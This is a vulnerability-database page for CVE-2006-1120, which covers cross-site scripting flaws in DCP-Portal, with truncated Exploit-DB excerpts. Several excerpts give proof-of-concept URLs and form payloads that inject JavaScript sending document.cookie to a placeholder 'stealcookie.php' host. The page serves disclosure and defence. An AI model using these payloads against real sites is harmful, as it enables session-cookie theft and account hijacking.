CVE-2006-1120
published 2006-03-09CVE-2006-1120: Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal 6.1.1 and earlier, with register_globals enabled, allow remote attackers to inject arbitrary…
PriorityP417low2.6CVSS 2.0
AVNACHAuNCNIPAN
EXPLOIT
EPSS
2.93%
85.3th percentile
Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal 6.1.1 and earlier, with register_globals enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) its_url parameter in the documents page and (2) url parameter in the send_write page of (a) index.php; (3) subject, and (4) images parameters to (b) calendar.php; (5) bid, (6) replying_msg, (7) subject, (8) body, and (9) mid parameters to (c) forums.php; (10) subject and (11) message parameters to (d) inbox.php; (12) subject_color and (13) email parameters to (e) lostpassword.php; and the (14) c_name, (15) content_inicial, and (16) cid parameters to (f) mycontents.php. NOTE: the calendar.php/day vector is already subsumed by CVE-2006-0220, and the calendar.php/month, calendar.php/year, and search.php/q parameters for calendar.php are already subsumed by CVE-2004-2511.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codeworx_technologies | dcp-portal | — | — |
| codeworx_technologies | dcp-portal | — | — |
| codeworx_technologies | dcp-portal | — | — |
| codeworx_technologies | dcp-portal | — | — |
| codeworx_technologies | dcp-portal | — | — |
| codeworx_technologies | dcp-portal | — | — |
| codeworx_technologies | dcp-portal | — | — |
| codeworx_technologies | dcp-portal | — | — |
| codeworx_technologies | dcp-portal | — | — |
| codeworx_technologies | dcp-portal | — | — |
| codeworx_technologies | dcp-portal | — | — |
| codeworx_technologies | dcp-portal | — | — |
| codeworx_technologies | dcp-portal | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DCP-Portal 3.7/4.x/5.x/6.x - 'lostpassword.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-09
CVE-2006-1120 DCP-Portal 3.7/4.x/5.x/6.x - 'lostpassword.php' Multiple Cross-Site Scripting Vulnerabilities
DCP-Portal 3.7/4.x/5.x/6.x - 'lostpassword.php' Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/17050/info
DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/dcp-portal611/lostpassword.php?subject_color=">document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie
http://www.example.com/dcp-portal611/lostpassword.php?email=">document.location
Exploit-DB
DCP-Portal 3.7/4.x/5.x/6.x - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-09
CVE-2006-1120 DCP-Portal 3.7/4.x/5.x/6.x - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities
DCP-Portal 3.7/4.x/5.x/6.x - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/17050/info
DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/dcp-portal611/calendar.php?subject_color=">document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie
http://www.example.com/dcp-portal611/calendar.php?images=">document.location="http://ww
Exploit-DB
DCP-Portal 3.7/4.x/5.x/6.x - 'mycontents.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-09
CVE-2006-1120 DCP-Portal 3.7/4.x/5.x/6.x - 'mycontents.php' Multiple Cross-Site Scripting Vulnerabilities
DCP-Portal 3.7/4.x/5.x/6.x - 'mycontents.php' Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/17050/info
DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/dcp-portal611/mycontents.php?action=content&c_name=">document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie
http://www.example.com/dcp-portal611/mycontents.php?action=content&content_
Exploit-DB
DCP-Portal 3.7/4.x/5.x/6.x - 'inbox.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-09
CVE-2006-1120 DCP-Portal 3.7/4.x/5.x/6.x - 'inbox.php' Multiple Cross-Site Scripting Vulnerabilities
DCP-Portal 3.7/4.x/5.x/6.x - 'inbox.php' Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/17050/info
DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
document.location="http://www.example.com/stealcookie.php?"+document.cookie' />
document.forms[0].submit();
document.location="http://www.example.com/stealcookie.php?"+document.cookie' />
document.forms[0].submit();
document.
Exploit-DB
DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-09
CVE-2006-1120 DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/17050/info
DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/dcp-portal611/index.php?page=documents&dl=xyz&its_url=xyz.html">document.location="http://www.example.com/stealcookie.php?"%2bdocument.cookie
http://www.example.com/dcp-portal611/index.php?page=send_write&url=xy
Exploit-DB
DCP-Portal 3.7/4.x/5.x/6.x - 'forums.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-03-09
CVE-2006-1120 DCP-Portal 3.7/4.x/5.x/6.x - 'forums.php' Multiple Cross-Site Scripting Vulnerabilities
DCP-Portal 3.7/4.x/5.x/6.x - 'forums.php' Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/17050/info
DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
document.location="http://www.example.com/stealcookie.php?"+document.cookie' />
document.forms[0].submit();
http://www.example.com/dcp-portal611/forums.php?action=board&bid=">document.location="http://www.example.com/stealcookie
No writeups or analysis indexed.
http://securityreason.com/securityalert/392http://www.osvdb.org/23976http://www.osvdb.org/23977http://www.osvdb.org/23978http://www.osvdb.org/23979http://www.osvdb.org/23980http://www.osvdb.org/23981http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-001.txthttp://www.securityfocus.com/archive/1/427175/100/0/threadedhttp://www.securityfocus.com/bid/17050https://exchange.xforce.ibmcloud.com/vulnerabilities/25279http://securityreason.com/securityalert/392http://www.osvdb.org/23976http://www.osvdb.org/23977http://www.osvdb.org/23978http://www.osvdb.org/23979http://www.osvdb.org/23980http://www.osvdb.org/23981http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-001.txthttp://www.securityfocus.com/archive/1/427175/100/0/threadedhttp://www.securityfocus.com/bid/17050https://exchange.xforce.ibmcloud.com/vulnerabilities/25279
2006-03-09
Published